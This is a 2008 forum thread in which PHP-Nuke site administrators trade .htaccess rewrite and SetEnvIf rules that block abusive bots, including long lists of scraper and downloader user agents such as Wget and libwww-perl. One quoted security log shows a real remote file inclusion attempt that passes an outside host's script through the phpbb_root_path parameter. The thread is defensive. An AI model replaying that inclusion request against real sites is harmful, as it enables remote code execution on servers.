Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - Other
Author Message
webservant
Worker
Worker


Joined: Feb 26, 2006
Posts: 206
Location: Springfield, MA

PostPosted: Sat Feb 02, 2008 6:16 pm Reply with quote

I'm currently running RN 2.10.01. Lately (like for the past month), Nuke Sentinel has been blocking about a dozen Abuse-Filter (see below) attempts per day. They all contain TotalCalendar which is a module that I used to have but has been gone for several months. My concern is that whoever this is continues to permanently block IP on a variety of subnets. Is there any way to catch and redirect the URL via .htaccess before it hits Nuke Sentinel?

Thanks for considering the problem and helping me with the solution...

Here's the ban email:
Code:
Date & Time: 2008-02-02 18:23:30 EST GMT -0500

Blocked IP: 71.192.149.*
User ID: Anonymous (1)
Reason: Abuse-Filter
--------------------
User Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.11) Gecko/20071204 Ubuntu/7.10 (gutsy) Firefox/2.0.0.11
Query String: Only registered users can see links on this board! Get registered or login!
Get String: Only registered users can see links on this board! Get registered or login!
Post String: Only registered users can see links on this board! Get registered or login!
Forwarded For: none
Client IP: none
Remote Address: 71.192.149.248
Remote Port: 63224
Request Method: GET
--------------------
Who-Is for IP


_________________
Awaiting His Shout
Webservant - GraciousCall.org
Romans 8:28-39 
View user's profile Send private message Visit poster's website AIM Address
evaders99
Former Moderator in Good Standing


Joined: Apr 30, 2004
Posts: 3221

PostPosted: Sat Feb 02, 2008 8:20 pm Reply with quote

While there are some more generic HTTP blocking one, here's a more specific one I us
Code:


RewriteCond %{THE_REQUEST}   (inc_dir)
RewriteRule ^.*$ http://127.0.0.1 [L]

_________________
- Only registered users can see links on this board! Get registered or login! -

Need help? Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
sowsteady
Regular
Regular


Joined: Apr 09, 2004
Posts: 87
Location: UK

PostPosted: Sun Feb 03, 2008 5:41 am Reply with quote

Evaders, based a previous post here on another thread, I changed mine to the following :-

Code:



RewriteCond %{QUERY_STRING} \.ru

RewriteCond %{HTTP_USER_AGENT} ^Java [NC,OR]

RewriteCond %{HTTP_USER_AGENT} ^LWP [NC,OR]

RewriteCond %{HTTP_USER_AGENT} ^lwp-trivial [OR]

RewriteCond %{HTTP_USER_AGENT} ^libwww-perl [OR]

RewriteCond %{HTTP_USER_AGENT} ^NaverBot [OR]

RewriteCond %{HTTP_USER_AGENT} ^Twiceler [NC,OR]

RewriteCond %{HTTP_USER_AGENT} ^Yeti [NC,OR]

RewriteCond %{HTTP_USER_AGENT} ^BlackWidow [OR]

RewriteCond %{HTTP_USER_AGENT} ^Bot\ mailto:craftbot@yahoo.com [OR]

RewriteCond %{HTTP_USER_AGENT} ^ChinaClaw [OR]

RewriteCond %{HTTP_USER_AGENT} ^Custo [OR]

RewriteCond %{HTTP_USER_AGENT} ^DISCo [OR]

RewriteCond %{HTTP_USER_AGENT} ^Download\ Demon [OR]

RewriteCond %{HTTP_USER_AGENT} ^eCatch [OR]

RewriteCond %{HTTP_USER_AGENT} ^EirGrabber [OR]

RewriteCond %{HTTP_USER_AGENT} ^EmailSiphon [OR]

RewriteCond %{HTTP_USER_AGENT} ^EmailWolf [OR]

RewriteCond %{HTTP_USER_AGENT} ^Express\ WebPictures [OR]

RewriteCond %{HTTP_USER_AGENT} ^ExtractorPro [OR]

RewriteCond %{HTTP_USER_AGENT} ^EyeNetIE [OR]

RewriteCond %{HTTP_USER_AGENT} ^FlashGet [OR]

RewriteCond %{HTTP_USER_AGENT} ^GetRight [OR]

RewriteCond %{HTTP_USER_AGENT} ^GetWeb! [OR]

RewriteCond %{HTTP_USER_AGENT} ^Go!Zilla [OR]

RewriteCond %{HTTP_USER_AGENT} ^Go-Ahead-Got-It [OR]

RewriteCond %{HTTP_USER_AGENT} ^GrabNet [OR]

RewriteCond %{HTTP_USER_AGENT} ^Grafula [OR]

RewriteCond %{HTTP_USER_AGENT} ^HMView [OR]

RewriteCond %{HTTP_USER_AGENT} HTTrack [NC,OR]

RewriteCond %{HTTP_USER_AGENT} ^Image\ Stripper [OR]

RewriteCond %{HTTP_USER_AGENT} ^Image\ Sucker [OR]

RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR]

RewriteCond %{HTTP_USER_AGENT} ^InterGET [OR]

RewriteCond %{HTTP_USER_AGENT} ^Internet\ Ninja [OR]

RewriteCond %{HTTP_USER_AGENT} ^JetCar [OR]

RewriteCond %{HTTP_USER_AGENT} ^JOC\ Web\ Spider [OR]

RewriteCond %{HTTP_USER_AGENT} ^larbin [OR]

RewriteCond %{HTTP_USER_AGENT} ^LeechFTP [OR]

RewriteCond %{HTTP_USER_AGENT} ^Mass\ Downloader [OR]

RewriteCond %{HTTP_USER_AGENT} ^MIDown\ tool [OR]

RewriteCond %{HTTP_USER_AGENT} ^Mister\ PiX [OR]

RewriteCond %{HTTP_USER_AGENT} ^Navroad [OR]

RewriteCond %{HTTP_USER_AGENT} ^NearSite [OR]

RewriteCond %{HTTP_USER_AGENT} ^NetAnts [OR]

RewriteCond %{HTTP_USER_AGENT} ^NetSpider [OR]

RewriteCond %{HTTP_USER_AGENT} ^Net\ Vampire [OR]

RewriteCond %{HTTP_USER_AGENT} ^NetZIP [OR]

RewriteCond %{HTTP_USER_AGENT} ^Octopus [OR]

RewriteCond %{HTTP_USER_AGENT} ^Offline\ Explorer [OR]

RewriteCond %{HTTP_USER_AGENT} ^Offline\ Navigator [OR]

RewriteCond %{HTTP_USER_AGENT} ^PageGrabber [OR]

RewriteCond %{HTTP_USER_AGENT} ^Papa\ Foto [OR]

RewriteCond %{HTTP_USER_AGENT} ^pavuk [OR]

RewriteCond %{HTTP_USER_AGENT} ^pcBrowser [OR]

RewriteCond %{HTTP_USER_AGENT} ^RealDownload [OR]

RewriteCond %{HTTP_USER_AGENT} ^ReGet [OR]

RewriteCond %{HTTP_USER_AGENT} ^SiteSnagger [OR]

RewriteCond %{HTTP_USER_AGENT} ^SmartDownload [OR]

RewriteCond %{HTTP_USER_AGENT} ^SuperBot [OR]

RewriteCond %{HTTP_USER_AGENT} ^SuperHTTP [OR]

RewriteCond %{HTTP_USER_AGENT} ^Surfbot [OR]

RewriteCond %{HTTP_USER_AGENT} ^tAkeOut [OR]

RewriteCond %{HTTP_USER_AGENT} ^Teleport\ Pro [OR]

RewriteCond %{HTTP_USER_AGENT} ^VoidEYE [OR]

RewriteCond %{HTTP_USER_AGENT} ^Web\ Image\ Collector [OR]

RewriteCond %{HTTP_USER_AGENT} ^Web\ Sucker [OR]

RewriteCond %{HTTP_USER_AGENT} ^WebAuto [OR]

RewriteCond %{HTTP_USER_AGENT} ^WebCopier [OR]

RewriteCond %{HTTP_USER_AGENT} ^WebFetch [OR]

RewriteCond %{HTTP_USER_AGENT} ^WebGo\ IS [OR]

RewriteCond %{HTTP_USER_AGENT} ^WebLeacher [OR]

RewriteCond %{HTTP_USER_AGENT} ^WebReaper [OR]

RewriteCond %{HTTP_USER_AGENT} ^WebSauger [OR]

RewriteCond %{HTTP_USER_AGENT} ^Website\ eXtractor [OR]

RewriteCond %{HTTP_USER_AGENT} ^Website\ Quester [OR]

RewriteCond %{HTTP_USER_AGENT} ^WebStripper [OR]

RewriteCond %{HTTP_USER_AGENT} ^WebWhacker [OR]

RewriteCond %{HTTP_USER_AGENT} ^WebZIP [OR]

RewriteCond %{HTTP_USER_AGENT} ^Wget [OR]

RewriteCond %{HTTP_USER_AGENT} ^Widow [OR]

RewriteCond %{HTTP_USER_AGENT} ^WWWOFFLE [OR]

RewriteCond %{HTTP_USER_AGENT} ^Xaldon\ WebSpider [OR]

RewriteCond %{HTTP_USER_AGENT} ^Zeus [OR]

RewriteRule ^.*$ http://127.0.0.1 [R,L]



deny from 69.90.135
deny from 69.94.10
deny from 66.160.143
deny from 75.125.48
deny from 67.19.49
deny from 62.193.230
deny from 72.32.58
deny from 130.225.62
deny from 69.61.61
deny from 217.11.251
deny from 208.75.227
deny from 216.227.209
deny from 85.12.13
deny from 64.185.237
deny from 81.169.174
deny from 84.40.222
deny from 210.114.223
deny from 68.157.122
deny from 85.126.175
deny from 75.0.141
deny from 24.222.5
deny from 69.20.67
deny from 209.50.244
deny from 204.15.198
deny from 204.10.55
deny from 71.86.32
deny from 64.251.21
deny from 209.51.212
deny from 60.244.114


Despite this I am also getting at least a dozen similar "attacks" loading up my email inbox. Where would I place the code you suggest above and should I just use the one you posted or add it to mine above?

I really need to learn this htaccess thing. Rolling Eyes


Last edited by sowsteady on Sun Feb 03, 2008 5:43 am; edited 2 times in total 
View user's profile Send private message Visit poster's website
webservant
PostPosted: Sun Feb 03, 2008 5:42 am Reply with quote

So, I assume that you place this at the top of the .htaccess in the root of the site, and it catches any incoming request having "inc_dir" - as this is a construct never used in RN. Very cool! Thanks!
 
webservant
PostPosted: Sun Feb 03, 2008 5:55 am Reply with quote

That works wonderfully! Thank you so much.
Taking a hint from an IBM support friend, I modified the code slightly:

Code:


RewriteCond %{THE_REQUEST}   (inc_dir)
RewriteRule ^.*$ http://127.0.0.1/get-a-life [L]
 
Gremmie
Former Moderator in Good Standing


Joined: Apr 06, 2006
Posts: 2415
Location: Iowa, USA

PostPosted: Sun Feb 03, 2008 7:26 am Reply with quote

sowsteady, do you have a RewriteEngine On statement?

_________________
Only registered users can see links on this board! Get registered or login! - An Event Calendar for PHP-Nuke
Only registered users can see links on this board! Get registered or login! - A Google Maps Nuke Module 
View user's profile Send private message
sowsteady
PostPosted: Sun Feb 03, 2008 11:13 am Reply with quote

Gremmie wrote:
sowsteady, do you have a RewriteEngine On statement?


Oops! No I think, the one I posted above is exactly how I have it.

I guess I need to add "RewriteEngine On" at the beginning?
 
evaders99
PostPosted: Sun Feb 03, 2008 9:43 pm Reply with quote

You can continue to add RewriteCond rules together. Just use the [OR] mark after the rule
 
sowsteady
PostPosted: Mon Feb 04, 2008 3:09 am Reply with quote

Evaders, thanks, so I ned to have something like ...

RewriteCond ON
RewriteCond %{QUERY_STRING} \.ru [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Java [NC,OR]
...
..


Is this right?
 
webservant
PostPosted: Mon Feb 04, 2008 6:24 am Reply with quote

You want to turn the rewrite engine (mod_rewrite) on, and I've never seen NC,OR in rewrite conditions. I'd write it this way:
Code:
RewriteEngine ON

RewriteCond %{QUERY_STRING} \.ru [OR]
RewriteCond %{HTTP_USER_AGENT} ^Java [OR]
...
RewriteRule ^.*$ http://127.0.0.1/get-a-life [L]
 
sowsteady
PostPosted: Mon Feb 04, 2008 7:29 am Reply with quote

webservant wrote:
You want to turn the rewrite engine (mod_rewrite) on, and I've never seen NC,OR in rewrite conditions. I'd write it this way:
Code:
RewriteEngine ON

RewriteCond %{QUERY_STRING} \.ru [OR]
RewriteCond %{HTTP_USER_AGENT} ^Java [OR]
...
RewriteRule ^.*$ http://127.0.0.1/get-a-life [L]


webservant, thanks. I'm going to try it because whatever I have now definitely is not quite right.
 
evaders99
PostPosted: Mon Feb 04, 2008 9:46 am Reply with quote

[NC] is just a tag meaning no case sensitivity. You can always include it to capture all case variations
 
webservant
PostPosted: Mon Feb 04, 2008 4:31 pm Reply with quote

Thanks for clearing my misperception.
 
bobbyg
Worker
Worker


Joined: Dec 05, 2007
Posts: 212
Location: Tampa, Florida

PostPosted: Tue Feb 05, 2008 2:39 pm Reply with quote

I placed this in the htaccess but found server error in the who-is-where block.

webservant wrote:
I'd write it this way:
Code:
RewriteEngine ON

RewriteCond %{QUERY_STRING} \.ru [OR]
RewriteCond %{HTTP_USER_AGENT} ^Java [OR]
...
RewriteRule ^.*$ http://127.0.0.1/get-a-life [L]
 
View user's profile Send private message Visit poster's website
fondy
Regular
Regular


Joined: Sep 12, 2003
Posts: 55

PostPosted: Thu Feb 07, 2008 1:52 am Reply with quote

Hi. have problems with libwww-perl. In .htaccess I have this:

Code:
Options All -Indexes

DirectoryIndex index.php index.htm index.html

# -------------------------------------------
# Start of NukeSentinel(tm) admin.php Auth
# -------------------------------------------
<Files .ftaccess>
  deny from all
</Files>

<Files .staccess>
  deny from all
</Files>

# -----------------------------------------------------------------------------------------------------
# Leave this block commented out unless HTTPAuth is NOT available in your NukeSentinel(tm) Admin Panel.
# This code is mainly for use with CGI Authentication and most servers do not require it.
# -----------------------------------------------------------------------------------------------------
# <Files admin.php>
#    <Limit GET POST PUT>
#       require valid-user
#    </Limit>
#    AuthName "Restricted"
#    AuthType Basic
#   AuthUserFile /path/to/your/.staccess
# </Files>
# -----------------------------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------------------------

RewriteEngine on
RewriteCond %{QUERY_STRING} \.ru
RewriteCond %{HTTP_USER_AGENT} ^Java [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^LWP [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^lwp-trivial [OR]
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^NaverBot [OR]
RewriteCond %{HTTP_USER_AGENT} ^Twiceler [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Yeti [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^BlackWidow [OR]
RewriteCond %{HTTP_USER_AGENT} ^Bot\ mailto:craftbot@yahoo.com [OR]
RewriteCond %{HTTP_USER_AGENT} ^ChinaClaw [OR]
RewriteCond %{HTTP_USER_AGENT} ^Custo [OR]
RewriteCond %{HTTP_USER_AGENT} ^DISCo [OR]
RewriteCond %{HTTP_USER_AGENT} ^Download\ Demon [OR]
RewriteCond %{HTTP_USER_AGENT} ^eCatch [OR]
RewriteCond %{HTTP_USER_AGENT} ^EirGrabber [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailSiphon [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailWolf [OR]
RewriteCond %{HTTP_USER_AGENT} ^Express\ WebPictures [OR]
RewriteCond %{HTTP_USER_AGENT} ^ExtractorPro [OR]
RewriteCond %{HTTP_USER_AGENT} ^EyeNetIE [OR]
RewriteCond %{HTTP_USER_AGENT} ^FlashGet [OR]
RewriteCond %{HTTP_USER_AGENT} ^GetRight [OR]
RewriteCond %{HTTP_USER_AGENT} ^GetWeb! [OR]
RewriteCond %{HTTP_USER_AGENT} ^Go!Zilla [OR]
RewriteCond %{HTTP_USER_AGENT} ^Go-Ahead-Got-It [OR]
RewriteCond %{HTTP_USER_AGENT} ^GrabNet [OR]
RewriteCond %{HTTP_USER_AGENT} ^Grafula [OR]
RewriteCond %{HTTP_USER_AGENT} ^HMView [OR]
RewriteCond %{HTTP_USER_AGENT} HTTrack [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Stripper [OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Sucker [OR]
RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^InterGET [OR]
RewriteCond %{HTTP_USER_AGENT} ^Internet\ Ninja [OR]
RewriteCond %{HTTP_USER_AGENT} ^JetCar [OR]
RewriteCond %{HTTP_USER_AGENT} ^JOC\ Web\ Spider [OR]
RewriteCond %{HTTP_USER_AGENT} ^larbin [OR]
RewriteCond %{HTTP_USER_AGENT} ^LeechFTP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mass\ Downloader [OR]
RewriteCond %{HTTP_USER_AGENT} ^MIDown\ tool [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mister\ PiX [OR]
RewriteCond %{HTTP_USER_AGENT} ^Navroad [OR]
RewriteCond %{HTTP_USER_AGENT} ^NearSite [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetAnts [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Net\ Vampire [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetZIP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Octopus [OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Explorer [OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Navigator [OR]
RewriteCond %{HTTP_USER_AGENT} ^PageGrabber [OR]
RewriteCond %{HTTP_USER_AGENT} ^Papa\ Foto [OR]
RewriteCond %{HTTP_USER_AGENT} ^pavuk [OR]
RewriteCond %{HTTP_USER_AGENT} ^pcBrowser [OR]
RewriteCond %{HTTP_USER_AGENT} ^RealDownload [OR]
RewriteCond %{HTTP_USER_AGENT} ^ReGet [OR]
RewriteCond %{HTTP_USER_AGENT} ^SiteSnagger [OR]
RewriteCond %{HTTP_USER_AGENT} ^SmartDownload [OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperBot [OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperHTTP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Surfbot [OR]
RewriteCond %{HTTP_USER_AGENT} ^tAkeOut [OR]
RewriteCond %{HTTP_USER_AGENT} ^Teleport\ Pro [OR]
RewriteCond %{HTTP_USER_AGENT} ^VoidEYE [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Image\ Collector [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Sucker [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebAuto [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebCopier [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebFetch [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebGo\ IS [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebLeacher [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebReaper [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebSauger [OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ eXtractor [OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ Quester [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebStripper [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebWhacker [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebZIP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Wget [OR]
RewriteCond %{HTTP_USER_AGENT} ^Widow [OR]
RewriteCond %{HTTP_USER_AGENT} ^WWWOFFLE [OR]
RewriteCond %{HTTP_USER_AGENT} ^Xaldon\ WebSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Zeus
RewriteRule ^.*$ http://127.0.0.1 [R,L]
RewriteEngine off

# -------------------------------------------
# Start of NukeSentinel(tm) DENY FROM area
# -------------------------------------------



But it seems that libwww-perl is not stopped by htaccess, because sentinel reports:

Code:
Date &amp; Time: 2008-02-07 03:48:07 CET GMT +0100

Blocked IP: 66.135.60.*
User ID: Anonymous (1)
Reason: Abuse-Filter
--------------------
User Agent: libwww-perl/5.79
Query String:
xxx.no/index.php?phpbb_root_path=http://www.secureonsites.com/_vti_var/load.txt??
Get String:
xxx.no/index.php?phpbb_root_path=http://www.secureonsites.com/_vti_var/load.txt??
Post String: xxx.no/index.php
Forwarded For: none
Client IP: none
Remote Address: 66.135.60.137
Remote Port: 51990
Request Method: GET
--------------------
Who-Is for IP


Do I have something wrong in my htaccess file?

regards fondy
 
View user's profile Send private message Visit poster's website
montego
Site Admin


Joined: Aug 29, 2004
Posts: 9453
Location: Arizona

PostPosted: Thu Feb 07, 2008 7:05 am Reply with quote

Your first RewriteCond line doesn't have the [OR] in it... Wink

_________________
Only registered users can see links on this board! Get registered or login!
Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
fondy
PostPosted: Thu Feb 07, 2008 7:14 am Reply with quote

Thx montego, I will change it and try Smile
 
fondy
PostPosted: Tue Feb 19, 2008 2:30 am Reply with quote

Hi

Instead of using rewrite to block, can this be an idea to include in htaccess :

Code:
SetEnvIfNoCase User-Agent "^libwww-perl" bad_bot

SetEnvIfNoCase User-Agent "^Baiduspider" bad_bot
SetEnvIfNoCase User-Agent "^BatchFTP" bad_bot
SetEnvIfNoCase User-Agent "^Bigfoot" bad_bot
SetEnvIfNoCase User-Agent "^Black.Hole" bad_bot
 
Order Allow,Deny
Allow from All
Deny from env=bad_bot


I have trouble with the the libwww-perl user agent, because it is not stopped in htaccess. Have these in htaccess:

Code:
Options All -Indexes

DirectoryIndex index.php index.htm index.html

# -------------------------------------------
# Start of NukeSentinel(tm) admin.php Auth
# -------------------------------------------
<Files .ftaccess>
  deny from all
</Files>

<Files .staccess>
  deny from all
</Files>

# -----------------------------------------------------------------------------------------------------
# Leave this block commented out unless HTTPAuth is NOT available in your NukeSentinel(tm) Admin Panel.
# This code is mainly for use with CGI Authentication and most servers do not require it.
# -----------------------------------------------------------------------------------------------------
# <Files admin.php>
#    <Limit GET POST PUT>
#       require valid-user
#    </Limit>
#    AuthName "Restricted"
#    AuthType Basic
#   AuthUserFile /path/to/your/.staccess
# </Files>
# -----------------------------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------------------------
RewriteEngine ON
RewriteCond %{QUERY_STRING} \.ru [OR]
RewriteCond %{HTTP_USER_AGENT} ^Java [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^LWP [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^lwp-trivial [OR]
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^NaverBot [OR]
RewriteCond %{HTTP_USER_AGENT} ^Twiceler [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Yeti [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^BlackWidow [OR]
RewriteCond %{HTTP_USER_AGENT} ^Bot\ mailto:craftbot@yahoo.com [OR]
RewriteCond %{HTTP_USER_AGENT} ^ChinaClaw [OR]
RewriteCond %{HTTP_USER_AGENT} ^Custo [OR]
RewriteCond %{HTTP_USER_AGENT} ^DISCo [OR]
RewriteCond %{HTTP_USER_AGENT} ^Download\ Demon [OR]
RewriteCond %{HTTP_USER_AGENT} ^eCatch [OR]
RewriteCond %{HTTP_USER_AGENT} ^EirGrabber [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailSiphon [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailWolf [OR]
RewriteCond %{HTTP_USER_AGENT} ^Express\ WebPictures [OR]
RewriteCond %{HTTP_USER_AGENT} ^ExtractorPro [OR]
RewriteCond %{HTTP_USER_AGENT} ^EyeNetIE [OR]
RewriteCond %{HTTP_USER_AGENT} ^FlashGet [OR]
RewriteCond %{HTTP_USER_AGENT} ^GetRight [OR]
RewriteCond %{HTTP_USER_AGENT} ^GetWeb! [OR]
RewriteCond %{HTTP_USER_AGENT} ^Go!Zilla [OR]
RewriteCond %{HTTP_USER_AGENT} ^Go-Ahead-Got-It [OR]
RewriteCond %{HTTP_USER_AGENT} ^GrabNet [OR]
RewriteCond %{HTTP_USER_AGENT} ^Grafula [OR]
RewriteCond %{HTTP_USER_AGENT} ^HMView [OR]
RewriteCond %{HTTP_USER_AGENT} HTTrack [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Stripper [OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Sucker [OR]
RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^InterGET [OR]
RewriteCond %{HTTP_USER_AGENT} ^Internet\ Ninja [OR]
RewriteCond %{HTTP_USER_AGENT} ^JetCar [OR]
RewriteCond %{HTTP_USER_AGENT} ^JOC\ Web\ Spider [OR]
RewriteCond %{HTTP_USER_AGENT} ^larbin [OR]
RewriteCond %{HTTP_USER_AGENT} ^LeechFTP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mass\ Downloader [OR]
RewriteCond %{HTTP_USER_AGENT} ^MIDown\ tool [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mister\ PiX [OR]
RewriteCond %{HTTP_USER_AGENT} ^Navroad [OR]
RewriteCond %{HTTP_USER_AGENT} ^NearSite [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetAnts [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Net\ Vampire [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetZIP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Octopus [OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Explorer [OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Navigator [OR]
RewriteCond %{HTTP_USER_AGENT} ^Opera [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^PageGrabber [OR]
RewriteCond %{HTTP_USER_AGENT} ^Papa\ Foto [OR]
RewriteCond %{HTTP_USER_AGENT} ^pavuk [OR]
RewriteCond %{HTTP_USER_AGENT} ^pcBrowser [OR]
RewriteCond %{HTTP_USER_AGENT} ^RealDownload [OR]
RewriteCond %{HTTP_USER_AGENT} ^ReGet [OR]
RewriteCond %{HTTP_USER_AGENT} ^SiteSnagger [OR]
RewriteCond %{HTTP_USER_AGENT} ^SmartDownload [OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperBot [OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperHTTP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Surfbot [OR]
RewriteCond %{HTTP_USER_AGENT} ^tAkeOut [OR]
RewriteCond %{HTTP_USER_AGENT} ^Teleport\ Pro [OR]
RewriteCond %{HTTP_USER_AGENT} ^VoidEYE [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Image\ Collector [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Sucker [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebAuto [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebCopier [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebFetch [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebGo\ IS [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebLeacher [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebReaper [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebSauger [OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ eXtractor [OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ Quester [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebStripper [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebWhacker [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebZIP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Wget [OR]
RewriteCond %{HTTP_USER_AGENT} ^wget [OR]
RewriteCond %{HTTP_USER_AGENT} ^Widow [OR]
RewriteCond %{HTTP_USER_AGENT} ^WWWOFFLE [OR]
RewriteCond %{HTTP_USER_AGENT} ^Xaldon\ WebSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Zeus
RewriteRule ^.*$ http://127.0.0.1 [R,L]
RewriteEngine OFF

# -------------------------------------------
# Start of NukeSentinel(tm) DENY FROM area
# -------------------------------------------


regards fondy
 
fondy
PostPosted: Thu Feb 21, 2008 4:16 am Reply with quote

If ModRewrite is not available, use this:

Code:
SetEnvIfNoCase user-agent "^Java" bad_bot

SetEnvIfNoCase user-agent "^LWP" bad_bot
SetEnvIfNoCase user-agent "^lwp-trivial" bad_bot
SetEnvIfNoCase user-agent "^libwww-perl" bad_bot
SetEnvIfNoCase user-agent "^NaverBot" bad_bot
SetEnvIfNoCase user-agent "^Twiceler" bad_bot
SetEnvIfNoCase user-agent "^Yeti" bad_bot
SetEnvIfNoCase user-agent "^BlackWidow" bad_bot
SetEnvIfNoCase user-agent "^Bot\ mailto:craftbot@yahoo.com" bad_bot
SetEnvIfNoCase user-agent "^ChinaClaw" bad_bot
SetEnvIfNoCase user-agent "^Custo" bad_bot
SetEnvIfNoCase user-agent "^DISCo" bad_bot
SetEnvIfNoCase user-agent "^Download\ Demon" bad_bot
SetEnvIfNoCase user-agent "^eCatch" bad_bot
SetEnvIfNoCase user-agent "^EirGrabber" bad_bot
SetEnvIfNoCase user-agent "^EmailSiphon" bad_bot
SetEnvIfNoCase user-agent "^EmailWolf" bad_bot
SetEnvIfNoCase user-agent "^Express\ WebPictures" bad_bot
SetEnvIfNoCase user-agent "^ExtractorPro" bad_bot
SetEnvIfNoCase user-agent "^EyeNetIE" bad_bot
SetEnvIfNoCase user-agent "^FlashGet" bad_bot
SetEnvIfNoCase user-agent "^GetRight" bad_bot
SetEnvIfNoCase user-agent "^GetWeb!" bad_bot
SetEnvIfNoCase user-agent "^Go!Zilla" bad_bot
SetEnvIfNoCase user-agent "^Go-Ahead-Got-It" bad_bot
SetEnvIfNoCase user-agent "^GrabNet" bad_bot
SetEnvIfNoCase user-agent "^Grafula" bad_bot
SetEnvIfNoCase user-agent "^HMView" bad_bot
SetEnvIfNoCase user-agent "HTTrack" bad_bot
SetEnvIfNoCase user-agent "^Image\ Stripper" bad_bot
SetEnvIfNoCase user-agent "^Image\ Sucker" bad_bot
SetEnvIfNoCase user-agent "Indy\ Library" bad_bot
SetEnvIfNoCase user-agent "^InterGET" bad_bot
SetEnvIfNoCase user-agent "^Internet\ Ninja" bad_bot
SetEnvIfNoCase user-agent "^JetCar" bad_bot
SetEnvIfNoCase user-agent "^JOC\ Web\ Spider" bad_bot
SetEnvIfNoCase user-agent "^larbin" bad_bot
SetEnvIfNoCase user-agent "^LeechFTP" bad_bot
SetEnvIfNoCase user-agent "^Mass\ Downloader" bad_bot
SetEnvIfNoCase user-agent "^MIDown\ tool" bad_bot
SetEnvIfNoCase user-agent "^Mister\ PiX" bad_bot
SetEnvIfNoCase user-agent "^Navroad" bad_bot
SetEnvIfNoCase user-agent "^NearSite" bad_bot
SetEnvIfNoCase user-agent "^NetAnts" bad_bot
SetEnvIfNoCase user-agent "^NetSpider" bad_bot
